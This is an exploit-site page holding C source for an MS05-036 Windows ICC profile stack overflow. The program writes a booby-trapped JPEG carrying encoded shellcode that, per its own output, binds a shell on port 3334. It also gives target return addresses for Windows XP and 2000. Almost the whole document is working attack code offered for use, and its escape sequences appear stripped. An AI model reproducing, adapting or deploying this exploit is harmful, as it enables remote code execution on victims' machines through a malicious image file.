[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Windows Color Management Module Overflow Exploit (MS05-036) (2)
# Published : 2006-02-17
# Author : darkeagle
# Previous Title : MS Windows IIS SA WebAgent 5.2/5.3 Redirect Overflow Exploit (meta)
# Next Title : Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit
/*
MS05-036 ICC Stack Overflow Exploit
/ by Darkeagle
/ GreetZ: all unl0ckerz, ed, f0st, uf0, sowhat, str0ke, #black, redsand
/
special tnx to snooq for his PoC.
/
/ xploit was tested on WinXP SP1 RUS with explorer.exe
/ 02.08.05
/ http://eagle.blacksecurity.org
*/
#include <string.h>
#include <stdio.h>
#include <windows.h>
#define TARGET 1
#define NOP 0x90
#define FNAME "eagl3.jpg"
#define BSIZE sizeof(buff)-1
#define EIP_OFFSET 0x3A0
#define SC_OFFSET 0x246
#define NOP_OFFSET 0x218
#define NOP_SIZE 0x112
#define tag_content_offset 0x23E // file buffer offset craft stuff
#define content_size_offset 0xE2 // tag content buffer size
#define no_access_violate 0x32E // avoid access violate
#define no_access_violate2 0x32E+12 // avoid access violate
#define stack_land_offset ret_addr_offset+16 // reture address offset
#define ret_addr_offset no_access_violate+8 // reture address offset
/*
* Silly JPEG stuffed with ICC profile.........
*/
char buff[]=
"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x00x01x00x60"
"x00x60x00x00xFFxE2x0Cx58x49x43x43x5Fx50x52x4Fx46"
"x49x4Cx45x00x01x01x00x00x0Cx48x4Cx69x6Ex6Fx02x10"
"x00x00x6Dx6Ex74x72x52x47x42x20x58x59x5Ax20x07xCE"
"x00x02x00x09x00x06x00x31x00x00x61x63x73x70x4Dx53"
"x46x54x00x00x00x00x49x45x43x20x73x52x47x42x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00xF6xD6x00x01"
"x00x00x00x00xD3x2Dx48x50x20x20x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x11x63x70x72x74x00x00"
"x01x50x00x00x00x33x64x65x73x63x00x00x01x84x00x00"
"x00x6Cx77x74x70x74x00x00x01xF0x00x00x00x14x62x6B"
"x70x74x00x00x02x04x00x00x00x14x72x58x59x5Ax00x00"
"x02x18x00x00x00xFCx67x58x59x5Ax00x00x02x2Cx00x00"
"x00x14x62x58x59x5Ax00x00x02x40x00x00x00x14x64x6D"
"x6Ex64x00x00x02x54x00x00x00x70x64x6Dx64x64x00x00"
"x02xC4x00x00x00x88x76x75x65x64x00x00x03x4Cx00x00"
"x00x86x76x69x65x77x00x00x03xD4x00x00x00x24x6Cx75"
"x6Dx69x00x00x03xF8x00x00x00x14x6Dx65x61x73x00x00"
"x04x0Cx00x00x00x24x74x65x63x68x00x00x04x30x00x00"
"x00x0Cx72x54x52x43x00x00x04x3Cx00x00x08x0Cx67x54"
"x52x43x00x00x04x3Cx00x00x08x0Cx62x54x52x43x00x00"
"x04x3Cx00x00x08x0Cx74x65x78x74x00x00x00x00x43x6F"
"x70x79x72x69x67x68x74x20x28x63x29x20x31x39x39x38"
"x20x48x65x77x6Cx65x74x74x2Dx50x61x63x6Bx61x72x64"
"x20x43x6Fx6Dx70x61x6Ex79x00x00x64x65x73x63x00x00"
"x00x00x00x00x00x12x73x52x47x42x20x49x45x43x36x31"
"x39x36x36x2Dx32x2Ex31x00x00x00x00x00x00x00x00x00"
"x00x00x12x73x52x47x42x20x49x45x43x36x31x39x36x36"
"x2Dx32x2Ex31x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x58x59x5Ax20x00x00x00x00x00x00"
"xF3x51x00x01x00x00x00x01x16xCCx58x59x5Ax20x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x58x59"
"x5Ax20x00x00x00x00x00x00x6FxA2x00x00x38xF5x00x00"
"x03x90x58x59x5Ax20x00x00x00x00x00x00x62x99x00x00"
"xB7x85x00x00x18xDAx58x59x5Ax20x00x00x00x00x00x00"
"x24xA0x00x00x0Fx84x00x00xB6xCFx64x65x73x63x00x00"
"x00x00x00x00x00x16x49x45x43x20x68x74x74x70x3Ax2F"
"x2Fx77x77x77x2Ex69x65x63x2Ex63x68x00x00x00x00x00"
"x00x00x00x00x00x00x16x49x45x43x20x68x74x74x70x3A"
"x2Fx2Fx77x77x77x2Ex69x65x63x2Ex63x68x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x64x65x73x63x00x00"
"x00x00x00x00x00x2Ex49x45x43x20x36x31x39x36x36x2D"
"x32x2Ex31x20x44x65x66x61x75x6Cx74x20x52x47x42x20"
"x63x6Fx6Cx6Fx75x72x20x73x70x61x63x65x20x2Dx20x73"
"x52x47x42x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x04x41x41x41x41x42x42x42x42x43x43x43x43x65x66"
"x61x75x6Cx74x20x52x47x42x20x63x6Fx6Cx6Fx75x72x20"
"x73x70x61x63x65x20x2Dx20x73x52x47x42x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x64x65x73x63x00x00x00x00x00x00x00x2Cx52x65"
"x66x65x72x65x6Ex63x65x20x56x69x65x77x69x6Ex67x20"
"x43x6Fx6Ex64x69x74x69x6Fx6Ex20x69x6Ex20x49x45x43"
"x36x31x39x36x36x2Dx32x2Ex31x00x00x00x00x00x00x00"
"x00x00x00x00x2Cx52x65x66x65x72x65x6Ex63x65x20x56"
"x69x65x77x69x6Ex67x20x43x6Fx6Ex64x69x74x69x6Fx6E"
"x20x69x6Ex20x49x45x43x36x31x39x36x36x2Dx32x2Ex31"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x76x69x65x77x00x00"
"x00x00x00x13xA4xFEx00x14x5Fx2Ex00x10xCFx14x00x03"
"xEDxCCx00x04x13x0Bx00x03x5Cx9Ex00x00x00x01x58x59"
"x5Ax20x00x00x00x00x00x4Cx09x56x00x50x00x00x00x57"
"x1FxE7x6Dx65x61x73x00x00x00x00x00x00x00x01x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x02x8Fx00x00x00x02x73x69x67x20x00x00x00x00x43x52"
"x54x20x63x75x72x76x00x00x00x00x00x00x04x00x00x00"
"x00x05x00x0Ax00x0Fx00x14x00x19x00x1Ex00x23x00x28"
"x00x2Dx00x32x00x37x00x3Bx00x40x00x45x00x4Ax00x4F"
"x00x54x00x59x00x5Ex00x63x00x68x00x6Dx00x72x00x77"
"x00x7Cx00x81x00x86x00x8Bx00x90x00x95x00x9Ax00x9F"
"x00xA4x00xA9x00xAEx00xB2x00xB7x00xBCx00xC1x00xC6"
"x00xCBx00xD0x00xD5x00xDBx00xE0x00xE5x00xEBx00xF0"
"x00xF6x00xFBx01x01x01x07x01x0Dx01x13x01x19x01x1F"
"x01x25x01x2Bx01x32x01x38x01x3Ex01x45x01x4Cx01x52"
"x01x59x01x60x01x67x01x6Ex01x75x01x7Cx01x83x01x8B"
"x01x92x01x9Ax01xA1x01xA9x01xB1x01xB9x01xC1x01xC9"
"x01xD1x01xD9x01xE1x01xE9x01xF2x01xFAx02x03x02x0C"
"x02x14x02x1Dx02x26x02x2Fx02x38x02x41x02x4Bx02x54"
"x02x5Dx02x67x02x71x02x7Ax02x84x02x8Ex02x98x02xA2"
"x02xACx02xB6x02xC1x02xCBx02xD5x02xE0x02xEBx02xF5"
"x03x00x03x0Bx03x16x03x21x03x2Dx03x38x03x43x03x4F"
"x03x5Ax03x66x03x72x03x7Ex03x8Ax03x96x03xA2x03xAE"
"x03xBAx03xC7x03xD3x03xE0x03xECx03xF9x04x06x04x13"
"x04x20x04x2Dx04x3Bx04x48x04x55x04x63x04x71x04x7E"
"x04x8Cx04x9Ax04xA8x04xB6x04xC4x04xD3x04xE1x04xF0"
"x04xFEx05x0Dx05x1Cx05x2Bx05x3Ax05x49x05x58x05x67"
"x05x77x05x86x05x96x05xA6x05xB5x05xC5x05xD5x05xE5"
"x05xF6x06x06x06x16x06x27x06x37x06x48x06x59x06x6A"
"x06x7Bx06x8Cx06x9Dx06xAFx06xC0x06xD1x06xE3x06xF5"
"x07x07x07x19x07x2Bx07x3Dx07x4Fx07x61x07x74x07x86"
"x07x99x07xACx07xBFx07xD2x07xE5x07xF8x08x0Bx08x1F"
"x08x32x08x46x08x5Ax08x6Ex08x82x08x96x08xAAx08xBE"
"x08xD2x08xE7x08xFBx09x10x09x25x09x3Ax09x4Fx09x64"
"x09x79x09x8Fx09xA4x09xBAx09xCFx09xE5x09xFBx0Ax11"
"x0Ax27x0Ax3Dx0Ax54x0Ax6Ax0Ax81x0Ax98x0AxAEx0AxC5"
"x0AxDCx0AxF3x0Bx0Bx0Bx22x0Bx39x0Bx51x0Bx69x0Bx80"
"x0Bx98x0BxB0x0BxC8x0BxE1x0BxF9x0Cx12x0Cx2Ax0Cx43"
"x0Cx5Cx0Cx75x0Cx8Ex0CxA7x0CxC0x0CxD9x0CxF3x0Dx0D"
"x0Dx26x0Dx40x0Dx5Ax0Dx74x0Dx8Ex0DxA9x0DxC3x0DxDE"
"x0DxF8x0Ex13x0Ex2Ex0Ex49x0Ex64x0Ex7Fx0Ex9Bx0ExB6"
"x0ExD2x0ExEEx0Fx09x0Fx25x0Fx41x0Fx5Ex0Fx7Ax0Fx96"
"x0FxB3x0FxCFx0FxECx10x09x10x26x10x43x10x61x10x7E"
"x10x9Bx10xB9x10xD7x10xF5x11x13x11x31x11x4Fx11x6D"
"x11x8Cx11xAAx11xC9x11xE8x12x07x12x26x12x45x12x64"
"x12x84x12xA3x12xC3x12xE3x13x03x13x23x13x43x13x63"
"x13x83x13xA4x13xC5x13xE5x14x06x14x27x14x49x14x6A"
"x14x8Bx14xADx14xCEx14xF0x15x12x15x34x15x56x15x78"
"x15x9Bx15xBDx15xE0x16x03x16x26x16x49x16x6Cx16x8F"
"x16xB2x16xD6x16xFAx17x1Dx17x41x17x65x17x89x17xAE"
"x17xD2x17xF7x18x1Bx18x40x18x65x18x8Ax18xAFx18xD5"
"x18xFAx19x20x19x45x19x6Bx19x91x19xB7x19xDDx1Ax04"
"x1Ax2Ax1Ax51x1Ax77x1Ax9Ex1AxC5x1AxECx1Bx14x1Bx3B"
"x1Bx63x1Bx8Ax1BxB2x1BxDAx1Cx02x1Cx2Ax1Cx52x1Cx7B"
"x1CxA3x1CxCCx1CxF5x1Dx1Ex1Dx47x1Dx70x1Dx99x1DxC3"
"x1DxECx1Ex16x1Ex40x1Ex6Ax1Ex94x1ExBEx1ExE9x1Fx13"
"x1Fx3Ex1Fx69x1Fx94x1FxBFx1FxEAx20x15x20x41x20x6C"
"x20x98x20xC4x20xF0x21x1Cx21x48x21x75x21xA1x21xCE"
"x21xFBx22x27x22x55x22x82x22xAFx22xDDx23x0Ax23x38"
"x23x66x23x94x23xC2x23xF0x24x1Fx24x4Dx24x7Cx24xAB"
"x24xDAx25x09x25x38x25x68x25x97x25xC7x25xF7x26x27"
"x26x57x26x87x26xB7x26xE8x27x18x27x49x27x7Ax27xAB"
"x27xDCx28x0Dx28x3Fx28x71x28xA2x28xD4x29x06x29x38"
"x29x6Bx29x9Dx29xD0x2Ax02x2Ax35x2Ax68x2Ax9Bx2AxCF"
"x2Bx02x2Bx36x2Bx69x2Bx9Dx2BxD1x2Cx05x2Cx39x2Cx6E"
"x2CxA2x2CxD7x2Dx0Cx2Dx41x2Dx76x2DxABx2DxE1x2Ex16"
"x2Ex4Cx2Ex82x2ExB7x2ExEEx2Fx24x2Fx5Ax2Fx91x2FxC7"
"x2FxFEx30x35x30x6Cx30xA4x30xDBx31x12x31x4Ax31x82"
"x31xBAx31xF2x32x2Ax32x63x32x9Bx32xD4x33x0Dx33x46"
"x33x7Fx33xB8x33xF1x34x2Bx34x65x34x9Ex34xD8x35x13"
"x35x4Dx35x87x35xC2x35xFDx36x37x36x72x36xAEx36xE9"
"x37x24x37x60x37x9Cx37xD7x38x14x38x50x38x8Cx38xC8"
"x39x05x39x42x39x7Fx39xBCx39xF9x3Ax36x3Ax74x3AxB2"
"x3AxEFx3Bx2Dx3Bx6Bx3BxAAx3BxE8x3Cx27x3Cx65x3CxA4"
"x3CxE3x3Dx22x3Dx61x3DxA1x3DxE0x3Ex20x3Ex60x3ExA0"
"x3ExE0x3Fx21x3Fx61x3FxA2x3FxE2x40x23x40x64x40xA6"
"x40xE7x41x29x41x6Ax41xACx41xEEx42x30x42x72x42xB5"
"x42xF7x43x3Ax43x7Dx43xC0x44x03x44x47x44x8Ax44xCE"
"x45x12x45x55x45x9Ax45xDEx46x22x46x67x46xABx46xF0"
"x47x35x47x7Bx47xC0x48x05x48x4Bx48x91x48xD7x49x1D"
"x49x63x49xA9x49xF0x4Ax37x4Ax7Dx4AxC4x4Bx0Cx4Bx53"
"x4Bx9Ax4BxE2x4Cx2Ax4Cx72x4CxBAx4Dx02x4Dx4Ax4Dx93"
"x4DxDCx4Ex25x4Ex6Ex4ExB7x4Fx00x4Fx49x4Fx93x4FxDD"
"x50x27x50x71x50xBBx51x06x51x50x51x9Bx51xE6x52x31"
"x52x7Cx52xC7x53x13x53x5Fx53xAAx53xF6x54x42x54x8F"
"x54xDBx55x28x55x75x55xC2x56x0Fx56x5Cx56xA9x56xF7"
"x57x44x57x92x57xE0x58x2Fx58x7Dx58xCBx59x1Ax59x69"
"x59xB8x5Ax07x5Ax56x5AxA6x5AxF5x5Bx45x5Bx95x5BxE5"
"x5Cx35x5Cx86x5CxD6x5Dx27x5Dx78x5DxC9x5Ex1Ax5Ex6C"
"x5ExBDx5Fx0Fx5Fx61x5FxB3x60x05x60x57x60xAAx60xFC"
"x61x4Fx61xA2x61xF5x62x49x62x9Cx62xF0x63x43x63x97"
"x63xEBx64x40x64x94x64xE9x65x3Dx65x92x65xE7x66x3D"
"x66x92x66xE8x67x3Dx67x93x67xE9x68x3Fx68x96x68xEC"
"x69x43x69x9Ax69xF1x6Ax48x6Ax9Fx6AxF7x6Bx4Fx6BxA7"
"x6BxFFx6Cx57x6CxAFx6Dx08x6Dx60x6DxB9x6Ex12x6Ex6B"
"x6ExC4x6Fx1Ex6Fx78x6FxD1x70x2Bx70x86x70xE0x71x3A"
"x71x95x71xF0x72x4Bx72xA6x73x01x73x5Dx73xB8x74x14"
"x74x70x74xCCx75x28x75x85x75xE1x76x3Ex76x9Bx76xF8"
"x77x56x77xB3x78x11x78x6Ex78xCCx79x2Ax79x89x79xE7"
"x7Ax46x7AxA5x7Bx04x7Bx63x7BxC2x7Cx21x7Cx81x7CxE1"
"x7Dx41x7DxA1x7Ex01x7Ex62x7ExC2x7Fx23x7Fx84x7FxE5"
"x80x47x80xA8x81x0Ax81x6Bx81xCDx82x30x82x92x82xF4"
"x83x57x83xBAx84x1Dx84x80x84xE3x85x47x85xABx86x0E"
"x86x72x86xD7x87x3Bx87x9Fx88x04x88x69x88xCEx89x33"
"x89x99x89xFEx8Ax64x8AxCAx8Bx30x8Bx96x8BxFCx8Cx63"
"x8CxCAx8Dx31x8Dx98x8DxFFx8Ex66x8ExCEx8Fx36x8Fx9E"
"x90x06x90x6Ex90xD6x91x3Fx91xA8x92x11x92x7Ax92xE3"
"x93x4Dx93xB6x94x20x94x8Ax94xF4x95x5Fx95xC9x96x34"
"x96x9Fx97x0Ax97x75x97xE0x98x4Cx98xB8x99x24x99x90"
"x99xFCx9Ax68x9AxD5x9Bx42x9BxAFx9Cx1Cx9Cx89x9CxF7"
"x9Dx64x9DxD2x9Ex40x9ExAEx9Fx1Dx9Fx8Bx9FxFAxA0x69"
"xA0xD8xA1x47xA1xB6xA2x26xA2x96xA3x06xA3x76xA3xE6"
"xA4x56xA4xC7xA5x38xA5xA9xA6x1AxA6x8BxA6xFDxA7x6E"
"xA7xE0xA8x52xA8xC4xA9x37xA9xA9xAAx1CxAAx8FxABx02"
"xABx75xABxE9xACx5CxACxD0xADx44xADxB8xAEx2DxAExA1"
"xAFx16xAFx8BxB0x00xB0x75xB0xEAxB1x60xB1xD6xB2x4B"
"xB2xC2xB3x38xB3xAExB4x25xB4x9CxB5x13xB5x8AxB6x01"
"xB6x79xB6xF0xB7x68xB7xE0xB8x59xB8xD1xB9x4AxB9xC2"
"xBAx3BxBAxB5xBBx2ExBBxA7xBCx21xBCx9BxBDx15xBDx8F"
"xBEx0AxBEx84xBExFFxBFx7AxBFxF5xC0x70xC0xECxC1x67"
"xC1xE3xC2x5FxC2xDBxC3x58xC3xD4xC4x51xC4xCExC5x4B"
"xC5xC8xC6x46xC6xC3xC7x41xC7xBFxC8x3DxC8xBCxC9x3A"
"xC9xB9xCAx38xCAxB7xCBx36xCBxB6xCCx35xCCxB5xCDx35"
"xCDxB5xCEx36xCExB6xCFx37xCFxB8xD0x39xD0xBAxD1x3C"
"xD1xBExD2x3FxD2xC1xD3x44xD3xC6xD4x49xD4xCBxD5x4E"
"xD5xD1xD6x55xD6xD8xD7x5CxD7xE0xD8x64xD8xE8xD9x6C"
"xD9xF1xDAx76xDAxFBxDBx80xDCx05xDCx8AxDDx10xDDx96"
"xDEx1CxDExA2xDFx29xDFxAFxE0x36xE0xBDxE1x44xE1xCC"
"xE2x53xE2xDBxE3x63xE3xEBxE4x73xE4xFCxE5x84xE6x0D"
"xE6x96xE7x1FxE7xA9xE8x32xE8xBCxE9x46xE9xD0xEAx5B"
"xEAxE5xEBx70xEBxFBxECx86xEDx11xEDx9CxEEx28xEExB4"
"xEFx40xEFxCCxF0x58xF0xE5xF1x72xF1xFFxF2x8CxF3x19"
"xF3xA7xF4x34xF4xC2xF5x50xF5xDExF6x6DxF6xFBxF7x8A"
"xF8x19xF8xA8xF9x38xF9xC7xFAx57xFAxE7xFBx77xFCx07"
"xFCx98xFDx29xFDxBAxFEx4BxFExDCxFFx6DxFFxFFxFFxFE"
"x00x1Fx4Cx45x41x44x20x54x65x63x68x6Ex6Fx6Cx6Fx67"
"x69x65x73x20x49x6Ex63x2Ex20x56x31x2Ex30x31x00xFF"
"xDBx00x84x00x02x02x02x02x02x02x02x02x02x02x03x03"
"x02x03x04x07x04x04x03x03x04x08x06x06x05x07x0Ax09"
"x0Ax0Ax0Ax09x0Ax09x0Bx0Cx10x0Ex0Bx0Cx0Fx0Cx09x0A"
"x0Ex13x0Ex0Fx11x11x12x12x12x0Bx0Dx14x15x14x12x15"
"x10x12x12x11x01x03x03x03x04x03x04x08x04x04x08x11"
"x0Bx0Ax0Bx11x11x11x11x11x11x11x11x11x11x11x11x11"
"x11x11x11x11x11x11x11x11x11x11x11x11x11x11x11x11"
"x11x11x11x11x11x11x11x11x11x11x11x11x11x11x11x11"
"x11x11x11x11x11xFFxC4x01xA2x00x00x01x05x01x01x01"
"x01x01x01x00x00x00x00x00x00x00x00x01x02x03x04x05"
"x06x07x08x09x0Ax0Bx01x00x03x01x01x01x01x01x01x01"
"x01x01x00x00x00x00x00x00x01x02x03x04x05x06x07x08"
"x09x0Ax0Bx10x00x02x01x03x03x02x04x03x05x05x04x04"
"x00x00x01x7Dx01x02x03x00x04x11x05x12x21x31x41x06"
"x13x51x61x07x22x71x14x32x81x91xA1x08x23x42xB1xC1"
"x15x52xD1xF0x24x33x62x72x82x09x0Ax16x17x18x19x1A"
"x25x26x27x28x29x2Ax34x35x36x37x38x39x3Ax43x44x45"
"x46x47x48x49x4Ax53x54x55x56x57x58x59x5Ax63x64x65"
"x66x67x68x69x6Ax73x74x75x76x77x78x79x7Ax83x84x85"
"x86x87x88x89x8Ax92x93x94x95x96x97x98x99x9AxA2xA3"
"xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBA"
"xC2xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8"
"xD9xDAxE1xE2xE3xE4xE5xE6xE7xE8xE9xEAxF1xF2xF3xF4"
"xF5xF6xF7xF8xF9xFAx11x00x02x01x02x04x04x03x04x07"
"x05x04x04x00x01x02x77x00x01x02x03x11x04x05x21x31"
"x06x12x41x51x07x61x71x13x22x32x81x08x14x42x91xA1"
"xB1xC1x09x23x33x52xF0x15x62x72xD1x0Ax16x24x34xE1"
"x25xF1x17x18x19x1Ax26x27x28x29x2Ax35x36x37x38x39"
"x3Ax43x44x45x46x47x48x49x4Ax53x54x55x56x57x58x59"
"x5Ax63x64x65x66x67x68x69x6Ax73x74x75x76x77x78x79"
"x7Ax82x83x84x85x86x87x88x89x8Ax92x93x94x95x96x97"
"x98x99x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5"
"xB6xB7xB8xB9xBAxC2xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3"
"xD4xD5xD6xD7xD8xD9xDAxE2xE3xE4xE5xE6xE7xE8xE9xEA"
"xF2xF3xF4xF5xF6xF7xF8xF9xFAxFFxC0x00x11x08x01x20"
"x01xE0x03x01x11x00x02x11x01x03x11x01xFFxDAx00x0C"
"x03x01x00x02x11x03x11x00x3Fx00xFDxFCxA0x02x80x0A"
"x00x28x00xA0x02x80x0Ax00x28x00xA0x02x80x0Ax00x28";
struct {
char *os;
long jmpADD;
long writeable_add;
}
targets[] = {
{ "Windows XP without SP eng/rus", 0x77E9FC79, 0x00064000 },
{ "Windows XP SP1 eng/rus ", 0x77E9AE59, 0x00064000 },
{ "Windows 2000 SP0 ", 0x77f8948b, 0x00064000 },
{ "Crash Explorer ", 0x41424344, 0x00064000 },
{ "Dummy (crash all) ", 0x0, 0x00064000 },
}, v;
unsigned char shellcode[] =
"x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x5e"
"xb0x8cx35x83xebxfcxe2xf4xa2xdax67x78xb6x49x73xca"
"xa1xd0x07x59x7ax94x07x70x62x3bxf0x30x26xb1x63xbe"
"x11xa8x07x6ax7exb1x67x7cxd5x84x07x34xb0x81x4cxac"
"xf2x34x4cx41x59x71x46x38x5fx72x67xc1x65xe4xa8x1d"
"x2bx55x07x6ax7axb1x67x53xd5xbcxc7xbex01xacx8dxde"
"x5dx9cx07xbcx32x94x90x54x9dx81x57x51xd5xf3xbcxbe"
"x1exbcx07x45x42x1dx07x75x56xeexe4xbbx10xbex60x65"
"xa1x66xeax66x38xd8xbfx07x36xc7xffx07x01xe4x73xe5"
"x36x7bx61xc9x65xe0x73xe3x01x39x69x53xdfx5dx84x37"
"x0bxdax8excax8exd8x55x3cxabx1dxdbxcax88xe3xdfx66"
"x0dxe3xcfx66x1dxe3x73xe5x38xd8x81x33x38xe3x05xd4"
"xcbxd8x28x2fx2ex77xdbxcax88xdax9cx64x0bx4fx5cx5d"
"xfax1dxa2xdcx09x4fx5ax66x0bx4fx5cx5dxbbxf9x0ax7c"
"x09x4fx5ax65x0axe4xd9xcax8ex23xe4xd2x27x76xf5x62"
"xa1x66xd9xcax8exd6xe6x51x38xd8xefx58xd7x55xe6x65"
"x07x99x40xbcxb9xdaxc8xbcxbcx81x4cxc6xf4x4excex18"
"xa0xf2xa0xa6xd3xcaxb4x9exf5x1bxe4x47xa0x03x9axca"
"x2bxf4x73xe3x05xe7xdex64x0fxe1xe6x34x0fxe1xd9x64"
"xa1x60xe4x98x87xb5x42x66xa1x66xe6xcaxa1x87x73xe5"
"xd5xe7x70xb6x9axd4x73xe3x0cx4fx5cx5dxaex3ax88x6a"
"x0dx4fx5axcax8exb0x8cx35";
char shellcod2e[]= "xebx0ex5bx4bx33xc9xb1xf1x80x34x0bxeexe2xfaxebx05"
"xe8xedxffxffxff"
/* 220 bytes shellcode, xor with 0xee */
"x07x4axeexeexeexb1x8ax4fxdexeexeexeex65xaexe2x65"
"x9exf2x43x65x86xe6x65x19x84xeaxb7x06xaaxeexeexee"
"x0cx17x86x81x80xeexeex86x9bx9cx82x83xbax11xf8x65"
"x06x06xc0xeexeexeex6dx02xcex65x32x84xcexbdx11xb8"
"xeax29xeaxedxb2x8fxc0x8bx29xaaxedxeax96x8bxeexee"
"xddx2exbexbexbdxb9xbex11xb8xfex65x32xbexbdx11xb8"
"xe6x11xb8xe2xbfxb8x65x9bxd2x65x9axc0x96xedx1bxb8"
"x65x98xcexedx1bxddx27xa7xafx43xedx2bxddx35xe1x50"
"xfexd4x38x9axe6x2fx25xe3xedx34xaex05x1fxd5xf1x9b"
"x09xb0x65xb0xcaxedx33x88x65xe2xa5x65xb0xf2xedx33"
"x65xeax65xedx2bx45xb0xb7x2dx06xb9x11x11x11x60xa0"
"xe0x02x2fx97x0bx56x76x10x64xe0x90x36x0cx9dxd8xf4"
"xc1x9ex86x9ax9ax9exd4xc1xc1xdfxdcxd9xc0xdexc0xde"
"xc0xdfxc1x9ax8bx9dx9axc0x8bx96x8bxee";
unsigned char b[4];
DWORD t2b(DWORD pBuf)
{
DWORD ret;
*((char*)&ret + 0) = *((char*)&pBuf +3);
*((char*)&ret + 1) = *((char*)&pBuf +2);
*((char*)&ret + 2) = *((char*)&pBuf +1);
*((char*)&ret + 3) = *((char*)&pBuf);
return ret;
}
void get_bytes(long word)
{
b[0]=word&0xff;
b[1]=(word>>8)& 0xff;
b[2]=(word>>16)&0xff;
b[3]=(word>>24)&0xff;
}
void err_exit(char *s)
{
printf("%sn",s);
exit(0);
}
void hexdump(char * pbuf,unsigned int size)
{
unsigned int i = 0;
for (; i < size ; i++){
printf("%.2X ", (unsigned char) pbuf[i]);
if( (i+1) %16 == 0)
putchar('n');
}
return;
}
void buildfile()
{
int i=0;
FILE *fd;
if ((fd=fopen(FNAME,"wb"))==NULL) {
err_exit("-> Failed to generate file...");
}
for(;i<BSIZE;i++) {
fputc(buff[i],fd);
}
fclose(fd);
printf("-> '%s' generated.n",FNAME);
printf("-> shellcode binds 3334 port.n");
}
void dword_revert(char * p,unsigned int size)
{
DWORD * ptr = &p;
int i = 0;
char * q = p + size; //end
for(; p <= q; p +=4)
{
*p ^= *(p+3);
*(p+3) ^= *p;
*p ^= *(p+3);
*(p+1) ^= *(p+2);
*(p+2) ^= *(p+1);
*(p+1) ^= *(p+2);
}
return;
}
void list_target()
{
unsigned int i = 0 ;
printf("nTargets ttn");
while(targets[i].jmpADD != NULL){
printf("#%dt%sn", i+1, targets[i].os);
i++;
}
return;
}
int main(int argc, char *argv[])
{
int i=0, t=TARGET, size=0;
int shal = 0;
unsigned int sc_size = strlen(shellcode);
unsigned int tag_size = stack_land_offset - tag_content_offset + 1 + sc_size ;
long fRetaddr = 0x00;
if (argc < 2) {
printf("nn");
printf("* Windows ICC stack overflow exploit (MS05-36)n");
printf("* Code Execution Exploitn");
printf("* (c) Darkeagle [ private code ]n");
printf("* usage -> ms05-036 <target> (jmp/call esp)n");
list_target() ;
exit(0);
}
t=atoi(argv[1]);
if ( argc == 3 )
sscanf(argv[2], "0x%x", &fRetaddr);
memset(buff + tag_content_offset, 0x90,tag_size);
*(DWORD*)(buff + no_access_violate2) = t2b(targets[t-1].writeable_add);
*(DWORD*)(buff + no_access_violate) = t2b(0x4);
if ( fRetaddr == 0x00 )
{
*(DWORD*)(buff + ret_addr_offset) = t2b(targets[t-1].jmpADD);
} else {
*(DWORD*)(buff + ret_addr_offset) = t2b(fRetaddr);
}
strncpy(buff + stack_land_offset, shellcode, sc_size);
dword_revert(buff + stack_land_offset, sc_size);
tag_size = (tag_size >> 2 << 2) + 4;
printf("current size: 0x%.8Xn",tag_size);
*(DWORD*)(buff + content_size_offset) = t2b(tag_size);
buildfile();
return 0;
}
// www.Syue.com [2006-02-17]